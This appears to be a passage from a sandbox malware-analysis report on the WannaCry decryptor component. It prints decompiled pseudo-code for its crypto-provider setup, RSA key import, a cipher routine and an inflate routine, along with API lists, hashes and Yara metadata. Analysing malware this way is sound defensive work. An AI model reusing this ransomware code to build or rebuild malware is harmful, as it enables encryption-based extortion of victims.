							_t200 =  *(_t286 + 8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
							 *_t274 =  *0x00416FB0 ^ _t200 >> 0x00000018;
							_t275 =  &(_t274[1]);
							asm("cdq");
							 *_t275 =  *0x00416FB0 ^ _t200 >> 0x00000010;
							asm("cdq");
							_t276 =  &(_t275[1]);
							 *_t276 =  *0x00416FB0 ^ _t200 >> 0x00000008;
							_t277 =  &(_t276[1]);
							asm("cdq");
							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x416fb0) ^ _t200;
							_t274 =  &(_t277[1]);
							_t145 =  *(_t287 + 0x44) + 1;
							_t262 = _t262 + 1;
							 *(_t287 + 0x44) = _t145;
							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
						} while (_t145 < _t196);
					}
					return _t145;
				} else {
					return E0040A610(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
				}
			}






























                                                      0x0040adc5
                                                      0x0040adce
                                                      0x0040add9
                                                      0x0040ade3
                                                      0x0040ade8
                                                      0x0040ade9
                                                      0x0040ade9
                                                      0x0040adee
                                                      0x0040adf7
                                                      0x0040ae14
                                                      0x0040ae1c
                                                      0x0040ae22
                                                      0x0040ae30
                                                      0x0040ae24
                                                      0x0040ae24
                                                      0x0040ae24
                                                      0x0040ae31
                                                      0x0040ae36
                                                      0x0040ae36
                                                      0x0040ae3c
                                                      0x0040ae3c
                                                      0x0040ae42
                                                      0x0040ae48
                                                      0x0040ae4c
                                                      0x0040ae50
                                                      0x0040ae54
                                                      0x0040ae54
                                                      0x0040ae5a
                                                      0x0040ae5c
                                                      0x0040ae60
                                                      0x0040ae63
                                                      0x0040ae67
                                                      0x0040ae6b
                                                      0x0040ae72
                                                      0x0040ae7e
                                                      0x0040ae83
                                                      0x0040ae8c
                                                      0x0040ae90
                                                      0x0040ae98
                                                      0x0040ae99
                                                      0x0040ae9e
                                                      0x0040aeab
                                                      0x0040aeac
                                                      0x0040aeb0
                                                      0x0040aeb0
                                                      0x0040aeb6
                                                      0x0040aeb6
                                                      0x0040aec0
                                                      0x0040aec7
                                                      0x0040aecb
                                                      0x0040aed1
                                                      0x0040aed4
                                                      0x0040aed8
                                                      0x0040aeda
                                                      0x0040aee4
                                                      0x0040aee6
                                                      0x0040aef2
                                                      0x0040aef4
                                                      0x0040aef4
                                                      0x0040aefa
                                                      0x0040aefe
                                                      0x0040af02
                                                      0x0040af10
                                                      0x0040af12
                                                      0x0040af15
                                                      0x0040af26
                                                      0x0040af2a
                                                      0x0040af4f
                                                      0x0040af72
                                                      0x0040af7d
                                                      0x0040af85
                                                      0x0040af88
                                                      0x0040af89
                                                      0x0040af8a
                                                      0x0040af8e
                                                      0x00000000
                                                      0x00000000
                                                      0x0040af08
                                                      0x0040af0c
                                                      0x0040af94
                                                      0x0040af94
                                                      0x0040af9e
                                                      0x0040afa4
                                                      0x0040afaa
                                                      0x0040afaa
                                                      0x0040afb6
                                                      0x0040afbc
                                                      0x0040afc0
                                                      0x0040afc4
                                                      0x0040afc4
                                                      0x0040aed8
                                                      0x0040afd0
                                                      0x0040afd8
                                                      0x0040afde
                                                      0x0040afe2
                                                      0x0040afe8
                                                      0x0040aff4
                                                      0x0040aff6
                                                      0x0040affa
                                                      0x0040affe
                                                      0x0040b00d
                                                      0x0040b029
                                                      0x0040b02b
                                                      0x0040b02f
                                                      0x0040b048
                                                      0x0040b04c
                                                      0x0040b051
                                                      0x0040b06a
                                                      0x0040b06c
                                                      0x0040b070
                                                      0x0040b08f
                                                      0x0040b091
                                                      0x0040b092
                                                      0x0040b096
                                                      0x0040b099
                                                      0x0040b09d
                                                      0x0040b09d
                                                      0x0040affe
                                                      0x0040b0ae
                                                      0x0040adf9
                                                      0x0040ae11
                                                      0x0040ae11

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                                      • Instruction ID: 9bf03c186ab60868eb4058f96665f2b4dca6c7ab88ed953fee9cff2198bbc34e
                                                      • Opcode Fuzzy Hash: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
                                                      • Instruction Fuzzy Hash: D691BE756083858FC718CF28D8805AABBE2FFC9308F14487EE989D7351C634E956CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004046F0 Relevance: 1.5, APIs: 1, Instructions: 46encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004046F0(void* __ecx, CHAR* _a4) {

				_t25 = __ecx;
				if(E004046B0(__ecx) != 0) {
					_t7 = _a4;
					if(_a4 != 0) {
						if(E004049B0( *(__ecx + 4), __ecx + 8, _t7) != 0) {
							goto L7;
						} else {
							E00404770(_t25);
							return 0;
						}
					} else {
						if(CryptImportKey( *(__ecx + 4), 0x420794, 0x494, 0, 0, __ecx + 8) != 0) {
							L7:
							return 1;
						} else {
							E00404770(_t25);
							return 0;
						}
					}
				} else {
					E00404770(__ecx);
					return 0;
				}
			}



                                                      0x004046f1
                                                      0x004046fa
                                                      0x00404709
                                                      0x0040470f
                                                      0x00404751
                                                      0x00000000
                                                      0x00404753
                                                      0x00404755
                                                      0x0040475d
                                                      0x0040475d
                                                      0x00404711
                                                      0x0040472f
                                                      0x00404760
                                                      0x00404766
                                                      0x00404731
                                                      0x00404733
                                                      0x0040473b
                                                      0x0040473b
                                                      0x0040472f
                                                      0x004046fc
                                                      0x004046fe
                                                      0x00404706
                                                      0x00404706

                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                      • CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727
                                                        • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                                        • Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                                        • Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$ContextDestroy$AcquireImportRelease
                                                      • String ID:
                                                      • API String ID: 3621138593-0
                                                      • Opcode ID: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                                      • Instruction ID: d4e90e0c2f988709a992e7d604814048f9cd1a1bd42c9a5a50fcd20aee9fd3f8
                                                      • Opcode Fuzzy Hash: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
                                                      • Instruction Fuzzy Hash: 5DF019F130425156E660E675A942F9B62998BE1B08F00483BF605E72D1EB78EC42829C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004046B0 Relevance: 1.5, APIs: 1, Instructions: 26encryptionCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E004046B0(void* __ecx) {
				int _t5;
				HCRYPTPROV* _t8;
				signed int _t9;

				_t9 = 0;
				_t8 = __ecx + 4;
				while(1) {
					asm("sbb eax, eax");
					_t5 = CryptAcquireContextA(_t8, 0,  ~_t9 & "Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000);
					if(_t5 != 0) {
						break;
					}
					_t9 = _t9 + 1;
					if(_t9 < 2) {
						continue;
					} else {
						return _t5;
					}
					L5:
				}
				return 1;
				goto L5;
			}






                                                      0x004046b2
                                                      0x004046b4
                                                      0x004046b7
                                                      0x004046c0
                                                      0x004046cd
                                                      0x004046d5
                                                      0x00000000
                                                      0x00000000
                                                      0x004046d7
                                                      0x004046db
                                                      0x00000000
                                                      0x004046df
                                                      0x004046df
                                                      0x004046df
                                                      0x00000000
                                                      0x004046db
                                                      0x004046e7
                                                      0x00000000

                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AcquireContextCrypt
                                                      • String ID:
                                                      • API String ID: 3951991833-0
                                                      • Opcode ID: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                                      • Instruction ID: 312dc029323720c7b5bb6801e757edcf2da9b650c6ce32f76f805a45e944d122
                                                      • Opcode Fuzzy Hash: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
                                                      • Instruction Fuzzy Hash: 63E0C27B35003029E320042ABC05BE786C8D7E2B61F014436FD05E6184D1598C8780D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DF30 Relevance: .5, Instructions: 515COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 89%
                                                      			E0040DF30() {
				intOrPtr _t308;
				intOrPtr _t310;
				signed int _t356;
				signed int* _t361;
				signed int _t362;
				intOrPtr _t403;
				signed int _t409;
				intOrPtr _t410;
				void* _t411;
				void* _t412;

				_t410 =  *((intOrPtr*)(_t412 + 0x24));
				_t409 =  *(_t412 + 0x2c);
				_t361 =  *(_t410 + 4);
				_t411 =  *_t409;
				_t356 =  *(_t410 + 0x1c);
				 *(_t412 + 0x2c) =  *(_t409 + 4);
				_t308 =  *((intOrPtr*)(_t410 + 0x30));
				 *(_t412 + 0x28) =  *(_t410 + 0x20);
				_t403 =  *((intOrPtr*)(_t410 + 0x34));
				 *(_t412 + 0x10) = _t361;
				if(_t403 >= _t308) {
					_t310 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
				} else {
					_t310 = _t308 - _t403 - 1;
				}
				_t362 =  *_t361;
				 *((intOrPtr*)(_t412 + 0x14)) = _t310;
				if(_t362 > 9) {
					L86:
					 *(_t410 + 0x20) =  *(_t412 + 0x28);
					 *(_t410 + 0x1c) = _t356;
					 *(_t409 + 4) =  *(_t412 + 0x2c);
					_push(0xfffffffe);
					_push(_t409);
					 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
					 *_t409 = _t411;
					_push(_t410);
					 *((intOrPtr*)(_t410 + 0x34)) = _t403;
					return E0040DDA0();
				} else {
					do {
						switch( *((intOrPtr*)(_t362 * 4 +  &M0040E6CC))) {
							case 0:
								if(_t310 < 0x102 ||  *(_t412 + 0x2c) < 0xa) {
									L12:
									_t315 =  *(_t412 + 0x10);
									 *_t315 = 1;
									_t315[3] = 0;
									_t315[2] = _t315[5];
									goto L13;
								} else {
									 *(_t410 + 0x20) =  *(_t412 + 0x28);
									 *(_t410 + 0x1c) = _t356;
									 *(_t409 + 4) =  *(_t412 + 0x2c);
									 *_t409 = _t411;
									_t349 =  *(_t412 + 0x10);
									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
									_push(_t409);
									_push(_t410);
									_push(_t349[6]);
									_push(_t349[5]);
									_push(0);
									_push(0);
									_t350 = E0040FBC0();
									_t411 =  *_t409;
									_t356 =  *(_t410 + 0x1c);
									 *(_t412 + 0x44) =  *(_t409 + 4);
									_t397 =  *((intOrPtr*)(_t410 + 0x30));
									 *(_t412 + 0x40) =  *(_t410 + 0x20);
									_t403 =  *((intOrPtr*)(_t410 + 0x34));
									_t412 = _t412 + 0x18;
									 *(_t412 + 0x30) = _t350;
									if(_t403 >= _t397) {
										_t399 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
									} else {
										_t399 = _t397 - _t403 - 1;
									}
									 *((intOrPtr*)(_t412 + 0x14)) = _t399;
									if(_t350 == 0) {
										goto L12;
									} else {
										asm("sbb eax, eax");
										 *( *(_t412 + 0x10)) = ( ~(_t350 - 1) & 0x00000002) + 7;
										_t310 =  *((intOrPtr*)(_t412 + 0x14));
										goto L85;
									}
								}
								goto L99;
							case 1:
								L13:
								_t317 = ( *(_t412 + 0x10))[3];
								 *(_t412 + 0x18) = _t317;
								if(_t356 >= _t317) {
									L16:
									_t321 = ( *(_t412 + 0x10))[2] + ( *(0x41a260 + _t317 * 4) &  *(_t412 + 0x28)) * 8;
									 *(_t412 + 0x18) = _t321;
									 *((intOrPtr*)(_t412 + 0x1c)) = 0;
									 *(_t412 + 0x28) =  *(_t412 + 0x28) >>  *(_t321 + 1);
									_t373 =  *(_t412 + 0x18);
									_t356 = _t356;
									_t326 =  *_t373;
									if(0 != 0) {
										if((_t326 & 0x00000010) == 0) {
											if((_t326 & 0x00000040) == 0) {
												goto L34;
											} else {
												_t329 =  *(_t412 + 0x10);
												if((_t326 & 0x00000020) == 0) {
													 *_t329 = 9;
													 *(_t409 + 0x18) = "invalid literal/length code";
													goto L90;
												} else {
													 *_t329 = 7;
													_t310 =  *((intOrPtr*)(_t412 + 0x14));
													goto L85;
												}
											}
										} else {
											_t381 =  *(_t412 + 0x10);
											_t381[2] = 0;
											 *_t381 = 2;
											_t381[1] =  *( *(_t412 + 0x18) + 4);
											_t310 =  *((intOrPtr*)(_t412 + 0x14));
											goto L85;
										}
									} else {
										_t337 =  *(_t412 + 0x10);
										_t337[2] =  *(_t373 + 4);
										 *_t337 = 6;
										_t310 =  *((intOrPtr*)(_t412 + 0x14));
										goto L85;
									}
								} else {
									while(1) {
										_t338 =  *(_t412 + 0x2c);
										if(_t338 == 0) {
											goto L88;
										}
										 *(_t412 + 0x2c) = _t338 - 1;
										_t345 = 0 << _t356;
										_t356 = _t356 + 8;
										 *(_t412 + 0x30) = 0;
										_t317 =  *(_t412 + 0x18);
										_t411 = _t411 + 1;
										 *(_t412 + 0x28) =  *(_t412 + 0x28) | _t345;
										if(_t356 < _t317) {
											continue;
										} else {
											goto L16;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 2:
								__ecx =  *(__esp + 0x10);
								__eax =  *( *(__esp + 0x10) + 8);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L26:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									__eax =  *(__esp + 0x10);
									 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
									__ecx =  *(__esp + 0x18);
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax =  *(__esp + 0x18);
									__ebx = __ebx -  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									__ecx = 0;
									__cl =  *((intOrPtr*)(__eax + 0x11));
									 *__eax = 3;
									 *(__eax + 0xc) = 0;
									__ecx =  *(__eax + 0x18);
									 *(__eax + 8) =  *(__eax + 0x18);
									goto L28;
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											goto L88;
										}
										__eax = __eax - 1;
										__ecx = __ebx;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__al =  *__ebp;
										__ebx = __ebx + 8;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L26;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 3:
								__eax =  *(__esp + 0x10);
								L28:
								__eax =  *(__eax + 0xc);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L31:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
									__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
									__ecx = 0;
									 *(__esp + 0x18) = __eax;
									__cl =  *((intOrPtr*)(__eax + 1));
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x1c) = 0;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax = 0;
									__ecx =  *(__esp + 0x18);
									__ebx = __ebx;
									__eax = 0;
									__al =  *( *(__esp + 0x18));
									if((__al & 0x00000010) == 0) {
										if((__al & 0x00000040) != 0) {
											__eax =  *(__esp + 0x10);
											 *( *(__esp + 0x10)) = 9;
											__edi[6] = "invalid distance code";
											L90:
											 *(_t410 + 0x20) =  *(_t412 + 0x28);
											 *(_t410 + 0x1c) = _t356;
											 *(_t409 + 4) =  *(_t412 + 0x2c);
											_push(0xfffffffd);
											_push(_t409);
											 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
											 *_t409 = _t411;
											_push(_t410);
											 *((intOrPtr*)(_t410 + 0x34)) = _t403;
											return E0040DDA0();
										} else {
											L34:
											( *(_t412 + 0x10))[3] = _t326;
											( *(_t412 + 0x10))[2] =  *(_t412 + 0x18) +  *( *(_t412 + 0x18) + 4) * 8;
											_t310 =  *((intOrPtr*)(_t412 + 0x14));
											goto L85;
										}
									} else {
										__ecx =  *(__esp + 0x10);
										__eax = 0;
										 *((intOrPtr*)(__ecx + 8)) = 0;
										 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
										 *__ecx = 4;
										 *(__ecx + 0xc) =  *( *(__esp + 0x18) + 4);
										__eax =  *(__esp + 0x14);
										goto L85;
									}
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											goto L88;
										}
										__eax = __eax - 1;
										__ecx = __ebx;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__al =  *__ebp;
										__ebx = __ebx + 8;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L31;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 4:
								__eax =  *(__esp + 0x10);
								__eax =  *( *(__esp + 0x10) + 8);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L38:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									__eax =  *(__esp + 0x10);
									 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
									__ecx =  *(__esp + 0x18);
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax =  *(__esp + 0x18);
									__ebx = __ebx -  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									 *( *(__esp + 0x10)) = 5;
									goto L39;
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											break;
										}
										__ecx = 0;
										__eax = __eax - 1;
										__cl =  *__ebp;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__ecx = __ebx;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										__ebx = __ebx + 8;
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L38;
										}
										goto L99;
									}
									L88:
									 *(_t410 + 0x1c) = _t356;
									 *(_t410 + 0x20) =  *(_t412 + 0x28);
									 *(_t409 + 4) = 0;
									 *_t409 = _t411;
									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
									_push( *(_t412 + 0x30));
									_push(_t409);
									_push(_t410);
									return E0040DDA0();
								}
								goto L99;
							case 5:
								L39:
								__ecx =  *(__esp + 0x10);
								__eax = __edx;
								__eax = __edx -  *((intOrPtr*)( *(__esp + 0x10) + 0xc));
								__ecx =  *(__esi + 0x28);
								 *(__esp + 0x1c) = __eax;
								if(__eax < __ecx) {
									__eax =  *(__esi + 0x2c);
									__eax =  *(__esi + 0x2c) - __ecx;
									__ecx =  *(__esp + 0x1c);
									 *(__esp + 0x20) = __eax;
									while(1) {
										__ecx = __ecx + __eax;
										__eax =  *(__esi + 0x28);
										if(__ecx >=  *(__esi + 0x28)) {
											break;
										}
										__eax =  *(__esp + 0x20);
									}
									 *(__esp + 0x1c) = __ecx;
								}
								__ecx =  *(__esp + 0x10);
								__eax =  *(__ecx + 4);
								__eax =  *(__esp + 0x14);
								if( *(__ecx + 4) != 0) {
									do {
										if(__eax != 0) {
											goto L62;
										} else {
											__eax =  *(__esi + 0x2c);
											 *(__esp + 0x18) = __eax;
											if(__edx != __eax) {
												L52:
												 *(__esi + 0x34) = __edx;
												__edx =  *(__esp + 0x30);
												_push( *(__esp + 0x30));
												_push(__edi);
												_push(__esi);
												__eax = E0040DDA0();
												__edx =  *(__esi + 0x34);
												 *(__esp + 0x3c) = __eax;
												__eax =  *(__esi + 0x30);
												__esp = __esp + 0xc;
												 *(__esp + 0x20) = __eax;
												if(__edx >= __eax) {
													__eax =  *(__esi + 0x2c);
													__eax =  *(__esi + 0x2c) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
												__ecx =  *(__esi + 0x2c);
												 *(__esp + 0x14) = __eax;
												 *(__esp + 0x18) = __ecx;
												if(__edx == __ecx) {
													__ecx =  *(__esi + 0x28);
													__eax =  *(__esp + 0x20);
													if(__eax == __ecx) {
														__eax =  *(__esp + 0x14);
													} else {
														__edx = __ecx;
														if(__edx >= __eax) {
															__eax =  *(__esp + 0x18);
															__eax =  *(__esp + 0x18) - __edx;
														} else {
															__eax = __eax - __edx;
															__eax = __eax - 1;
														}
													}
												}
												if(__eax == 0) {
													goto L91;
												} else {
													goto L62;
												}
											} else {
												__eax =  *(__esi + 0x30);
												__ecx =  *(__esi + 0x28);
												if(__eax == __ecx) {
													goto L52;
												} else {
													__edx = __ecx;
													if(__edx >= __eax) {
														__eax =  *(__esp + 0x18);
														__eax =  *(__esp + 0x18) - __edx;
													} else {
														__eax = __eax - __edx;
														__eax = __eax - 1;
													}
													if(__eax != 0) {
														goto L62;
													} else {
														goto L52;
													}
												}
											}
										}
										goto L99;
										L62:
										__ecx =  *(__esp + 0x1c);
										__edx = __edx + 1;
										 *(__esp + 0x30) = 0;
										__cl =  *( *(__esp + 0x1c));
										 *(__edx - 1) = __cl;
										__ecx =  *(__esp + 0x1c);
										__ecx =  *(__esp + 0x1c) + 1;
										__eax = __eax - 1;
										 *(__esp + 0x1c) = __ecx;
										 *(__esp + 0x14) = __eax;
										if(__ecx ==  *(__esi + 0x2c)) {
											__ecx =  *(__esi + 0x28);
											 *(__esp + 0x1c) =  *(__esi + 0x28);
										}
										__ecx =  *(__esp + 0x10);
										_t212 = __ecx + 4;
										 *_t212 =  *(__ecx + 4) - 1;
									} while ( *_t212 != 0);
								}
								goto L84;
							case 6:
								if(__eax != 0) {
									L83:
									__ecx =  *(__esp + 0x10);
									__edx = __edx + 1;
									__eax = __eax - 1;
									 *(__esp + 0x30) = 0;
									__cl =  *( *(__esp + 0x10) + 8);
									 *(__esp + 0x14) = __eax;
									 *(__edx - 1) = __cl;
									__ecx =  *(__esp + 0x10);
									L84:
									 *__ecx = 0;
									goto L85;
								} else {
									__eax =  *(__esi + 0x2c);
									 *(__esp + 0x18) = __eax;
									if(__edx != __eax) {
										L73:
										 *(__esi + 0x34) = __edx;
										__edx =  *(__esp + 0x30);
										_push( *(__esp + 0x30));
										_push(__edi);
										_push(__esi);
										__eax = E0040DDA0();
										__edx =  *(__esi + 0x34);
										 *(__esp + 0x3c) = __eax;
										__eax =  *(__esi + 0x30);
										__esp = __esp + 0xc;
										 *(__esp + 0x20) = __eax;
										if(__edx >= __eax) {
											__eax =  *(__esi + 0x2c);
											__eax =  *(__esi + 0x2c) - __edx;
										} else {
											__eax = __eax - __edx;
											__eax = __eax - 1;
										}
										__ecx =  *(__esi + 0x2c);
										 *(__esp + 0x14) = __eax;
										 *(__esp + 0x18) = __ecx;
										if(__edx == __ecx) {
											__ecx =  *(__esi + 0x28);
											__eax =  *(__esp + 0x20);
											if(__eax == __ecx) {
												__eax =  *(__esp + 0x14);
											} else {
												__edx = __ecx;
												if(__edx >= __eax) {
													__eax =  *(__esp + 0x18);
													__eax =  *(__esp + 0x18) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
											}
										}
										if(__eax == 0) {
											L91:
											__eax =  *(__esp + 0x28);
											__ecx =  *(__esp + 0x2c);
											 *(__esi + 0x20) =  *(__esp + 0x28);
											 *(__esi + 0x1c) = __ebx;
											__ebx =  *__edi;
											__eax = __ebp;
											__edi[1] =  *(__esp + 0x2c);
											__ecx = __edi[2];
											__eax = __ebp -  *__edi;
											 *__edi = __ebp;
											__ecx = __edi[2] + __ebp -  *__edi;
											__edi[2] = __edi[2] + __ebp -  *__edi;
											__ecx =  *(__esp + 0x30);
											_push( *(__esp + 0x30));
											_push(__edi);
											_push(__esi);
											 *(__esi + 0x34) = __edx;
											__eax = E0040DDA0();
											__esp = __esp + 0xc;
											return __eax;
										} else {
											goto L83;
										}
									} else {
										__eax =  *(__esi + 0x30);
										__ecx =  *(__esi + 0x28);
										if(__eax == __ecx) {
											goto L73;
										} else {
											__edx = __ecx;
											if(__edx >= __eax) {
												__eax =  *(__esp + 0x18);
												__eax =  *(__esp + 0x18) - __edx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											if(__eax != 0) {
												goto L83;
											} else {
												goto L73;
											}
										}
									}
								}
								goto L99;
							case 7:
								if(__ebx > 7) {
									__ecx =  *(__esp + 0x2c);
									__ebx = __ebx - 8;
									__ecx =  *(__esp + 0x2c) + 1;
									__ebp = __ebp - 1;
									 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
								}
								 *(__esi + 0x34) = __edx;
								__edx =  *(__esp + 0x30);
								_push( *(__esp + 0x30));
								_push(__edi);
								_push(__esi);
								__eax = E0040DDA0();
								__edx =  *(__esi + 0x34);
								__ecx =  *(__esi + 0x30);
								__esp = __esp + 0xc;
								if( *(__esi + 0x30) == __edx) {
									__eax =  *(__esp + 0x10);
									 *( *(__esp + 0x10)) = 8;
									goto L97;
								} else {
									__ecx =  *(__esp + 0x28);
									 *(__esi + 0x1c) = __ebx;
